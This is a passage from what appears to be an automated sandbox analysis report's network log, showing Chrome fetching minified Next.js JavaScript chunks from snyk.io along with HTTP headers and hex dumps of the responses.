                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9875],{73359:function(l,i,e){e.d(i,{Z:function(){return r}});var o=e(85893),n=e(45697),d=e.n(n),a=e(44133);function t(l){let{label:i,className:e}=l;return(0,o.jsx)("span",{className:(0,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              20192.168.2.54974123.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC375OUTGET /_next/static/chunks/2614.3ec078ba5dda1b72.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="2614.3ec078ba5dda1b72.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"063426302167d73bd81249302550a93b"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:51 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/2614.3ec078ba5dda1b72.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::2q8wm-1729257060113-e1a49b23e4e2
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:58 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3501
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799338.109125c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC3501INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 36 31 34 5d 2c 7b 35 36 39 38 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 65 2c 69 29 7b 69 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6e 3d 69 28 38 35 38 39 33 29 2c 72 3d 69 28 36 37 32 39 34 29 2c 61 3d 69 28 34 35 36 39 37 29 2c 73 3d 69 2e 6e 28 61 29 2c 6f 3d 69 28 34 30 30 37 30 29 2c 64 3d 69 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 74 28 6c 29 7b 6c 65 74 20 65 3b 6c 65 74 7b 6c 6f 67 6f 73 3a 69 2c 68 65 61 64 6c 69 6e 65 3a 61 2c 69 73 43 6c 75 73 74 65 72 3a 73 2c 69 73
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2614],{5698:function(l,e,i){i.d(e,{Z:function(){return u}});var n=i(85893),r=i(67294),a=i(45697),s=i.n(a),o=i(40070),d=i(44133);function t(l){let e;let{logos:i,headline:a,isCluster:s,is


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              21192.168.2.54973823.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC516OUTGET /_next/static/chunks/6936.f953d0b9b00df349.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="6936.f953d0b9b00df349.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"bc1072f0bc0a6f99055052157e07511f"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/6936.f953d0b9b00df349.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::tw8vw-1729257050705-0c3349091afa
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:58 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 4822
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799338.1f601ea
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC4822INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 39 33 36 5d 2c 7b 31 36 39 33 36 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 64 29 7b 64 2e 72 28 69 29 3b 76 61 72 20 6f 3d 64 28 38 35 38 39 33 29 2c 76 3d 64 28 38 38 30 31 35 29 2c 6e 3d 64 28 39 36 36 32 30 29 2c 65 3d 64 28 32 33 37 35 31 29 2c 75 3d 64 28 37 34 31 32 39 29 2c 61 3d 64 28 38 36 39 34 33 29 2c 73 3d 64 28 36 32 31 35 29 2c 74 3d 64 28 38 36 34 33 37 29 3b 6c 65 74 20 72 3d 6c 3d 3e 28 7b 2e 2e 2e 61 2e 5a 2c 72 65 6e 64 65 72 4e 6f 64 65 3a 7b 2e 2e 2e 61 2e 5a 2e 72 65 6e 64 65 72 4e 6f 64 65 2c 5b 74 2e 42 4c 4f 43 4b 53 2e
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6936],{16936:function(l,i,d){d.r(i);var o=d(85893),v=d(88015),n=d(96620),e=d(23751),u=d(74129),a=d(86943),s=d(6215),t=d(86437);let r=l=>({...a.Z,renderNode:{...a.Z.renderNode,[t.BLOCKS.


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              22192.168.2.54973723.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC516OUTGET /_next/static/chunks/5185.9a7562e082cb91f4.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="5185.9a7562e082cb91f4.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"cdd91066649969be0f00f607a9ad9249"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/5185.9a7562e082cb91f4.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::qbspv-1729257050723-f53d3cbffe4e
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:58 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 5958
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799338.1f60203
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC5958INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 38 35 5d 2c 7b 38 32 34 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 69 29 7b 69 2e 64 28 6c 2c 7b 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 6c 65 74 20 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 35 2c 69 3d 31 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 65
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5185],{8241:function(e,l,i){i.d(l,{d:function(){return n},x:function(){return d}});let d=function(e){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,i=1;switch(!0){case e


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              23192.168.2.54973523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC516OUTGET /_next/static/chunks/3259-a3f17db6e69abe5a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="3259-a3f17db6e69abe5a.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"9226380572c7d17a92e9224c394fb751"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/3259-a3f17db6e69abe5a.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::cpztg-1729257050724-a173095f3ea7
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:58 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 11309
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799338.1f60220
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC11309INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 32 35 39 5d 2c 7b 36 31 33 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 61 29 7b 61 2e 64 28 6c 2c 7b 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 6c 65 74 20 6f 3d 65 3d 3e 7b 6c 65 74 20 6c 3d 65 2e 74 72 69 6d 28 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 6c 2e 72 65 64 75 63 65 28 28 65 2c 61 2c 6f 29 3d 3e 28 28 30 3d 3d 3d 6f 7c 7c 6f 3d 3d 3d 6c 2e 6c 65 6e 67 74 68 2d 31 29 26 26 28 65 3d 22 22 2e 63 6f 6e 63 61 74 28 65 29 2e 63 6f 6e 63 61 74 28 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3259],{61375:function(e,l,a){a.d(l,{Q:function(){return o}});let o=e=>{let l=e.trim().split(" ");return l.reduce((e,a,o)=>((0===o||o===l.length-1)&&(e="".concat(e).concat(a.charAt(0).to


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              24192.168.2.54974323.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC375OUTGET /_next/static/chunks/1751.f8f467cbaf47e698.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="1751.f8f467cbaf47e698.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"10a12f623813aabd1075d8a47b163938"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/1751.f8f467cbaf47e698.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::m9l4v-1729257060049-afcb4107b963
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:58 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 5358
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799338.109130d
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC5358INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 35 31 5d 2c 7b 38 31 37 35 31 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6c 2c 6f 29 7b 6f 2e 72 28 6c 29 2c 6f 2e 64 28 6c 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 7d 29 3b 76 61 72 20 64 3d 6f 28 38 35 38 39 33 29 2c 6e 3d 6f 28 34 35 36 39 37 29 2c 65 3d 6f 2e 6e 28 6e 29 2c 76 3d 6f 28 39 36 30 39 38 29 2c 74 3d 6f 28 31 35 30 32 30 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 69 29 7b 6c 65 74 7b 73 65 63 74 69 6f 6e 3a 6c 2c 63 6f 6c 6f 72 53 63 68 65 6d 65 3a 6f 2c 63 68 69 6c 64 72 65 6e 3a 6e 3d 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1751],{81751:function(i,l,o){o.r(l),o.d(l,{default:function(){return I}});var d=o(85893),n=o(45697),e=o.n(n),v=o(96098),t=o(15020);function u(i){let{section:l,colorScheme:o,children:n=[


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              25192.168.2.54974423.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC516OUTGET /_next/static/chunks/9384.57f0a60a33b0d128.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9384.57f0a60a33b0d128.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"76632caa03fb2384173175c4284d918f"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9384.57f0a60a33b0d128.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::p72nm-1729257050706-de1866fa820f
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:59 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 2496
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799339.1f602d0
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC2496INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 33 38 34 5d 2c 7b 37 39 33 38 34 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 64 29 7b 64 2e 72 28 69 29 3b 76 61 72 20 6f 3d 64 28 38 35 38 39 33 29 2c 76 3d 64 28 34 33 32 35 39 29 2c 75 3d 64 28 32 33 37 35 31 29 2c 6e 3d 64 28 38 32 34 31 29 2c 65 3d 64 28 37 34 31 32 39 29 2c 73 3d 64 28 38 36 39 34 33 29 3b 69 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 69 2c 64 2c 61 2c 74 2c 63 2c 72 2c 66 2c 6d 2c 67 2c 68 2c 70 2c 5f 2c 62 2c 6b 2c 79 2c 78 2c 4e 2c 43 2c 48 2c 71 2c 77 2c 42 2c 45 2c 47 2c 5a 2c 6a 2c 46 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9384],{79384:function(l,i,d){d.r(i);var o=d(85893),v=d(43259),u=d(23751),n=d(8241),e=d(74129),s=d(86943);i.default=function(l){var i,d,a,t,c,r,f,m,g,h,p,_,b,k,y,x,N,C,H,q,w,B,E,G,Z,j,F,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              26192.168.2.54974723.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC375OUTGET /_next/static/chunks/2165.946eebc4630896bc.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="2165.946eebc4630896bc.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"59370e3451c4718a1194e07e3f4f3947"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/2165.946eebc4630896bc.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::h8dz8-1729257060048-3079f3430936
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:59 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 13465
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
